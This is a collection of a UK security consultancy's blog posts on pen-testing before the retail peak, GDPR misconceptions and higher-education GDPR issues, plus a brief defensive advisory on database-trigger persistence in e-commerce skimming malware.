Pen testing: why businesses need to be proactive not reactive ahead of the peak retail period

A breach at any time of the year is bad for business. But with the highest volume of sales – both retail and online – occurring between Black Friday and the January Sales, a customer data breach during this period could be catastrophic. With just a few weeks to go, it is time to be proactive, not reactive.  Seeking external professional services at this stage could ultimately save immense damage to your business, your bottom line and your reputation.

First, some context. According to research (Carbon Black 2018), when it comes to cybercrime the most proactive investors are actually the cyber criminals themselves. It is estimated that they are now spending ten times more on finding cyber defence weaknesses in target organisations than the organisations themselves are spending on protecting against attack. Although the figures are global, with an estimated $1 trillion being spent by the cybercrime community compared to $96 billion by organisations to secure themselves, the UK has been identified as a major target.

Malicious attacks are therefore a very real threat, whether dealing with card transactions through a bricks-and-mortar shop or an online business. Unfortunately compliance does not guarantee security of your network systems. Like an MOT it only demonstrates that at a certain date and time your business had met the PCI DSS compliance standard. Similarly, businesses which have taken positive steps towards adhering to the requirements of GDPR will still need to take a proactive approach to defending against cybercrime.

So, what can be done? The most important investment at this stage is in professional penetration testing. This is the key to knowing exactly where potential vulnerabilities may lie. A bespoke combination of both manual and automated testing is an extremely efficient way to identify weaknesses and can be carried out with minimal disruption. If serious gaps are identified then further testing will exploit and develop these as a potential hacker would, providing you with valuable intelligence. You will then be in a position to work with experts to take whatever remedial action is required in good time. If actual (as yet undetected) breaches have already occurred, these can be reported on and contained before significant damage occurs.

While prudent investment in cyber security is vital, there is, however, no need to throw money at the problem. Engaging a professional consultancy with the full range of services will save you any unnecessary expense. This is because the exercise will be scoped to ensure you pay for what you need, not what you don’t. A professional team will also have the expertise to manage the whole process in a proactive way to ensure you are ready for business at the end of November.

Although every precaution should be taken to protect your systems, test and exercise is not the only important element of a mature and robust cyber defence.  Business Continuity Planning, Incident Response and Disaster Recovery Plans should also be in place and watertight. An expert consultancy will be able to help develop these so that business interruption in the event of a breach is kept to an absolute minimum. Additionally, SRM can provide Red Teaming and Incident Simulation activities to give you ultimate peace of mind

To discuss the full availability of our Test and Exercise and Incident Response services, call +44 (0) 3450 21 21 51.

To receive regular blogs on topics relating to information security, follow us on Linkedin.

Or visit our blog:

Pen testing: seeing both the wood and the trees

Penetration testing: man vs machine



The GDPR compliance fallacy

There is a curious irony that the enactment of the General Data Protection Regulation (GDPR), drawn up to protect the rights of individuals and their right to online privacy, has brought about an unprecedented torrent of spam. In the fortnight leading up to 25th May, inboxes were filled with emails asking people to opt in to mailing lists, supposedly so that the organisation in question could comply with the requirements of GDPR. There are two fallacies to be addressed here.

Firstly, although individuals should be given the option to be removed from any mailing list, if they have willingly provided their contact details to the organisation and that organisation has maintained a record of the data collected, with the data subject being informed about what the data would be used for and for how long it would be kept, their consent may be considered to be implicit. In these circumstances new explicit consent is not required.

Secondly, although the principles of GDPR are enshrined in UK law and failure to adhere to them can lead to significant fines, there is currently no concrete GDPR compliance process. It is expected that a GDPR compliance standard will be drawn up in the near future, but for now, organisations can use the organisational governance requirements provided by the Payment Card Industry Data Security Standard (PCI DSS) or ISO 27001 to provide a helpful framework. It is then the responsibility of the organisation’s Data Protection Officer (DPO) or Chief Information Security Officer (CISO) to ensure that the additional requirements of GDPR are included in their systems. These are just two of many fallacies surrounding the GDPR.

Having detailed information security policies and procedures is an important step, but on their own will not ensure that the requirements of GDPR are satisfied. Plans and policies simply demonstrate management intent and will be ineffective in satisfying the requirements of GDPR unless clear guidelines are provided in an easily understood format, to the grass roots of an organisation. Many businesses would do well to use some of the energy expended in communicating with their customers on ensuring a good channel of communication around GDPR with their employees.

It is important to remember that GDPR should not be seen as a burden but rather a positive force for change, focusing attention on implementing better processes for how we collect, store and manage data and thereby enhancing and building better customer relationships.

Professional expert guidance will assist in streamlining this process. SRM’s GDPR team provides a business-focused service to organisations of all types and size at all ends of the GDPR-readiness spectrum. We have operated in this arena for many years and our GDPR consultants have undertaken GCHQ certified training. We can also take on the full CISO or DPO role if required.


To gauge your level of GDPR readiness, see our step by step self-assessment guide.

See our GDPR web page.

Or visit our blog:

The key to GDPR is common sense

How PCI compliance puts you on course for GDPR


eDisclosure webinar: seven reasons why your firm should consider a managed service

SRM is hosting a free eDisclosure webinar on Wednesday 18th April at 3pm.

We find ourselves in an ever changing eDisclosure landscape. Join us for our upcoming webinar during which the head of our eDisclosure team Colin Gray will explore the seven reasons why your firm should consider a managed service rather than addressing eDisclosure on an ad hoc basis.

All you need to do is register here.

GDPR: 10 key issues facing UK higher education

The world of higher education is about to be turned on its head. This is due to the imminent enactment of the General Data Protection Regulation (GDPR) which will come into effect on 25th May 2018. It marks a new era in the world of personal data protection with accountability at its centre. Although the updating of data protection law is overdue and welcomed by consumers, it does put demanding responsibilities onto the shoulders of Chief Information Security Officers (CISOs) in higher education institutions across the UK.

True expertise in GDPR compliance is a rare commodity and few resident CISOs have had time to acquire the required skill set. For this reason, many are using the additional resource and support of specialists to ensure the compliance requirements are met and resilient strategies put in place. SRM’s GDPR team has operated in the information security environment for many years and our GDPR consultants have undergone GCHQ certified training and gained GDPR Practitioner certification. As such they are uniquely well–placed to advise on the strategic implementation of GDPR. Here, they identify the key issues facing the higher education sector.

1. Awareness

It is important that everyone is aware of the changes that GDPR will bring. Vice Chancellors, executive boards, deans, academics and lecturers will all need to be aware of how the changes in data protection legislation will affect them. The mantle of data protection usually falls to the Chief Information Security Officer (CISO) who is likely to take on or oversee the role of Data Protection Officer (DPO), which is a requirement of GDPR. To ensure this is done effectively, the CISO will need to have senior-level influence, with the relevant knowledge and authority to manage the process or be given the financial resource to secure additional support and expertise from an industry professional or Virtual CISO service.

2. Information life cycle audit

Institutions will be held more accountable for the data they hold. In addition to keeping records about what personal data exists with the organisation’s systems, GDPR requires a documented understanding of why information is held, how it is collected, when it will be deleted or anonymised and who has access to it. Data will include everything from phone records to employment details. Some information will be categorised as sensitive and some as non-sensitive and all this information needs to be mapped.

3. Incident Response

Keeping information secure is a primary requirement and there will be new obligations to report security breaches to the Information Commissioner’s Office (ICO) within 72 hours where it creates a risk to the affected individuals. This is likely to occur, for example, in cases of identity theft or financial loss and organisations will also be required to inform the individuals affected. Incident Response which outlines protocols to detect, investigate and respond to personal data breaches is an important element of this process.

4. Data Protection by Design

GDPR introduces new obligations on information-handling processes and the systems that are developed. Data protection should be built in with data privacy settings being the default. It is anticipated that GDPR will require ‘data protection by design’ to be extended to existing systems within three years. Formal data protection impact assessments should be undertaken as part of the design process.

5. Demonstration of consent

Not all data processing requires explicit consent, but where it is applicable, institutions need to be able to demonstrate that consent is ‘freely given, specific, informed and unambiguous’. This means individuals will need to specifically opt in, rather than simply fail to opt out.

6. Considering the necessity of data collection

Continuing with the concept of consent, institutions will be required to consider whether the collection of data and its processing is actually necessary. Recognised legal bases include contract, legal obligation, vital interest, public interest or legitimate interest of the organisation. If these apply then processes must meet the requirements of GDPR.

7. Reviewing privacy notices

When accessing individual’s personal data, these individuals must be informed of the legal basis for processing their data, the retention period and the individual’s rights to complain to the ICO if they consider there to be an issue. This will typically be in the form of a privacy notice.

8. Increased consumer expectations

High profile breaches have brought damaging publicity to a number of higher education institutions. With this heightened awareness comes an increased knowledge of the individual’s rights to data privacy. Those using an institution’s systems will expect to have their data protected and may challenge where this is not obviously being promoted. Communication about GDPR compliance will be a necessary aspect of the DPO role.

9. Ensuring an individual’s rights can be upheld

Under GDPR the rights of individuals have been enhanced. They include the right to subject access, having inaccuracies corrected, having information erased, data portability and the right to be excluded from direct marketing or automated decision-making and profiling.

10. Data breach notification

GDPR introduces the mandatory reporting of data breaches to the regulator without undue delay and no later than 72 hours of becoming aware of the breach. In some cases this will apply to the data subjects as well. Higher Education istitutions therefore need to give careful thought to breach prevention and to ensuring that there is a data breach procedure in place.  Awareness in-house training for staff is a vital element of this process. Having a coherent approach to data breaches will not only ensures compliance with GDPR but has the added benefit of minimising adverse publicity.


SRM’s GDPR team provides a business-focused service to organisations and higher education institutions of all types and size, at all ends of the GDPR-readiness spectrum. While we provide unrivalled technical and compliance expertise, we also understand how businesses and higher education institutions operate, working with clients in the GDPR compliance process with the focus on delivering robust and effective compliance, not on selling products.

For more information on our GDPR services visit our GDPR page or our Virtual CISO service page.

To gauge your level of GDPR readiness, complete our GDPR Self Assessment Questionnaire.

Or read our blog:

How does GDPR differ from the UK Data Protection Bill?

How a CISO can exert influence at board level


Emerging Trend: Persistent JavaScript Ecommerce Malware

Our analysts report another trend that Administrators should be aware of.  This is a JavaScript-based eCommerce malware that enables the malware to re-infect websites automatically upon incomplete removal.  It has been identified as a new technique being used by cyber criminals.

This type of malware obtains its persistence by modifying databases to force the injection of a malicious JavaScript file into an eCommerce webpage. By targeting databases, the malware therefore becomes resilient to normal removal attempts. Cyber criminals have recently used this technique to target eCommerce merchants by successfully injecting the JavaScript code into a database field of a merchants website and compromising payment card data.

This malware reinfection method can be used on any eCommerce platform that uses database fields to populate content on the shopping cart webpage. Reinfection of websites can be done with the following processes:
1. A database trigger is added to the order table, which injects the malicious JavaScript link into the website template fields.
2. The trigger is executed every time a new order is made.

Scanning for malicious code in HTML files is not sufficient enough to detect this malware alone. Analysis of the database is required to ensure a proper clean-up of JavaScript eCommerce malware is conducted.
Regular scanning of webservers for malware is one recommended mitigation measure eCommerce websites can take to identify security vulnerabilities. Another recommended best practice is to check for malicious database triggers on eCommerce websites and subsequently remove these.

If you are in doubt, contact the SRM  team who can arrange to run a check for you!

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

SRM Blog